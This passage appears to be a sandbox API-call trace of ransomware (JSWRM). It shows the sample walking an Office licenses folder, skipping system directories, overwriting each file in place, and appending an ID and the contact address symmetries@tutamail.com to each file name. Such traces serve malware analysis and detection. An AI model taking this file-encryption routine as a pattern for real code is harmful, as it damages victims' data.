dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0105.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.226] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11635) returned 1 [0105.226] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.226] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.240] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.240] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.241] CloseHandle (hObject=0x45c) returned 1 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0105.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0105.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0105.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.241] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0105.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.243] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7d1b583, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7d1b583, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7ebef60, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial5-pl.xrm-ms", cAlternateFileName="O3072B~1.XRM")) returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2=".") returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="..") returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="...") returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="windows") returned -1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="recovery") returned -1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.243] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-pl.xrm-ms", lpString2="msocache") returned 1 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.244] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0105.244] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.244] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.248] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.248] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.248] CloseHandle (hObject=0x45c) returned 1 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0105.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0105.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0105.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.249] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651da72, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe651da72, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe664edb3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial5-ppd.xrm-ms", cAlternateFileName="O3CFAB~1.XRM")) returned 1 [0105.249] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2=".") returned 1 [0105.249] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="..") returned 1 [0105.249] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="...") returned 1 [0105.249] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="windows") returned -1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.250] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial5-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0105.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.251] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23135) returned 1 [0105.251] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0105.251] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0105.255] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.255] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0105.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.255] CloseHandle (hObject=0x45c) returned 1 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0105.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0105.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.255] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0105.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.257] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe632dbcf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe632dbcf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe63ec79f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d73, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial5-ul-oob.xrm-ms", cAlternateFileName="O3F58C~1.XRM")) returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.257] lstrcmpiW (lpString1="O365HomePremR_SubTrial5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.257] lstrcmpiW 